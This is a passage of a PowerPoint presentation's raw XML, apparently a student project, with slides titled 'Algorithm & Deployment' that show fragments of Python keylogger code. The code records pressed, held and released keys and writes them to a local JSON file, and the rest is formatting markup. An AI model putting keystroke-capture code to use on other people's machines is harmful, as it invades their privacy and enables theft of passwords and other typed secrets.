                <a:tab pos="0" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>to ethical standards and regulations.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1800" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1191"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="992"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="374151"/>
              </a:buClr>
              <a:buFont typeface="OpenSymbol"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-IN" sz="1800" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>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581040" y="702000"/>
            <a:ext cx="11029320" cy="529920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="b">
            <a:normAutofit fontScale="74983" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" strike="noStrike" cap="all" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Franklin Gothic Demi"/>
              </a:rPr>
              <a:t>Algorithm &amp; Deployment</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="129" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="380880" y="477000"/>
            <a:ext cx="11029320" cy="4672800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>1.Import the necessary libraries:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="340"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1700" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="130" name="Picture 3"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1767600" y="2813760"/>
            <a:ext cx="8087400" cy="1523880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">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581040" y="702000"/>
            <a:ext cx="11029320" cy="529920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="b">
            <a:normAutofit fontScale="74983" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" strike="noStrike" cap="all" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Franklin Gothic Demi"/>
              </a:rPr>
              <a:t>Algorithm &amp; Deployment</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="132" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="218520" y="-431280"/>
            <a:ext cx="11029320" cy="4672800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>1.Create GUI</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="340"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1700" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="133" name="Picture 5"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="581040" y="1745280"/>
            <a:ext cx="10954800" cy="4667400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">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581040" y="702000"/>
            <a:ext cx="11029320" cy="529920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="b">
            <a:normAutofit fontScale="74983" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" strike="noStrike" cap="all" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Franklin Gothic Demi"/>
              </a:rPr>
              <a:t>Algorithm &amp; Deployment</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="135" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="296640" y="-426960"/>
            <a:ext cx="11029320" cy="4672800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>1.Import the necessary libraries:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="340"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1700" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="136" name="TextBox 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3535560" y="1640880"/>
            <a:ext cx="5608080" cy="5576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en-IN" sz="1800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t># Initialize the variables</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keys_used = []</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flag = False</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keys = ""</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1800" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pP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 Define the on_press function</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def on_press(key):</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    global flag, keys_used, keys</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    if flag == False:</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        keys_used.append(</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            {'Pressed': f'{key}'}</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        )</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        flag = True</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1800" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pP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    if flag == True:</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        keys_used.append(</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            {'Held': f'{key}'}</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        )</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1800" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-IN" sz="1800" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-IN" sz="1800" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>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581040" y="702000"/>
            <a:ext cx="11029320" cy="529920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="b">
            <a:normAutofit fontScale="74983" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" strike="noStrike" cap="all" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Franklin Gothic Demi"/>
              </a:rPr>
              <a:t>Algorithm &amp; Deployment</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="296640" y="-426960"/>
            <a:ext cx="11029320" cy="4672800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>1.Import the necessary libraries:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="340"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1700" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="139" name="TextBox 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3535560" y="1640880"/>
            <a:ext cx="5608080" cy="5027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en-IN" sz="1800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t># Define the on_release function</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def on_release(key):</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    global flag, keys_used, keys</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    keys_used.append(</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        {'Released': f'{key}'}</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    )</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1800" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pP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    if flag == True:</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        flag = False</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1800" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pP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    keys = keys + str(key)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1800" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pP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 Define the generate_json_file function</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def generate_json_file(keys_used):</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    with open('key_log.json', '+wb') as key_log:</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        key_list_bytes = json.dumps(keys_used).encode()</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1800" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>        key_log.write(key_list_bytes)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1800" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-IN" sz="1800" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin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majorFont>
      <a:minorFont>
        <a:latin typeface="Franklin Gothic Book" panose="020B0502020104020203"/>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a:gradFill>
        <a:gradFill>
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="phClr">
                <a:tint val="98000"/>
                <a:lumMod val="110000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="84000">
              <a:schemeClr val="phClr">
                <a:shade val="90000"/>
                <a:lumMod val="88000"/>
              </a:schemeClr>
            </a:gs>
          </a:gsLst>
          <a:lin ang="5400000" scaled="0"/>
          <a:tileRect/>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a:gradFill>
        <a:gradFill>
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="phClr">
                <a:tint val="90000"/>
                <a:lumMod val="110000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="phClr">
                <a:shade val="98000"/>
                <a:lumMod val="86000"/>
              </a:schemeClr>
            </a:gs>
          </a:gsLst>
          <a:path path="circle">
            <a:fillToRect l="50000" t="50000" r="100000" b="100000"/>
          </a:path>
          <a:tileRect/>
        </a:gradFill>
      </a:bgFillStyleLst>
    </a:fmtScheme>
  </a:themeElements>
  <a:objectDefaults/>
  <a:extraClrSchemeLst/>
</a:theme>
</file>

<file path=ppt/theme/theme10.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majorFont>
      <a:minorFont>
        <a:latin typeface="Franklin Gothic Book" panose="020B0502020104020203"/>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a:gradFill>
        <a:gradFill>
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="phClr">
                <a:tint val="98000"/>
                <a:lumMod val="110000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="84000">
              <a:schemeClr val="phClr">
                <a:shade val="90000"/>
                <a:lumMod val="88000"/>
              </a:schemeClr>
            </a:gs>
          </a:gsLst>
          <a:lin ang="5400000" scaled="0"/>
          <a:tileRect/>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a:gradFill>
        <a:gradFill>
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="phClr">
                <a:tint val="90000"/>
                <a:lumMod val="110000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="phClr">
                <a:shade val="98000"/>
                <a:lumMod val="86000"/>
              </a:schemeClr>
            </a:gs>
          </a:gsLst>
          <a:path path="circle">
            <a:fillToRect l="50000" t="50000" r="100000" b="100000"/>
          </a:path>
          <a:tileRect/>
        </a:gradFill>
      </a:bgFillStyleLst>
    </a:fmtScheme>
  </a:themeElements>
  <a:objectDefaults/>
  <a:extraClrSchemeLst/>
</a:theme>
</file>

<file path=ppt/theme/theme1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majorFont>
      <a:minorFont>
        <a:latin typeface="Franklin Gothic Book" panose="020B0502020104020203"/>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a:gradFill>
        <a:gradFill>
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="phClr">
                <a:tint val="98000"/>
                <a:lumMod val="110000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="84000">
              <a:schemeClr val="phClr">
                <a:shade val="90000"/>
                <a:lumMod val="88000"/>
              </a:schemeClr>
            </a:gs>
          </a:gsLst>
          <a:lin ang="5400000" scaled="0"/>
          <a:tileRect/>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a:gradFill>
        <a:gradFill>
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="phClr">
                <a:tint val="90000"/>
                <a:lumMod val="110000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="phClr">
                <a:shade val="98000"/>
                <a:lumMod val="86000"/>
              </a:schemeClr>
            </a:gs>
          </a:gsLst>
          <a:path path="circle">
            <a:fillToRect l="50000" t="50000" r="100000" b="100000"/>
          </a:path>
          <a:tileRect/>
        </a:gradFill>
      </a:bgFillStyleLst>
    </a:fmtScheme>
  </a:themeElements>
  <a:objectDefaults/>
  <a:extraClrSchemeLst/>
</a:theme>
</file>

<file path=ppt/theme/theme2.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majorFont>
      <a:minorFont>
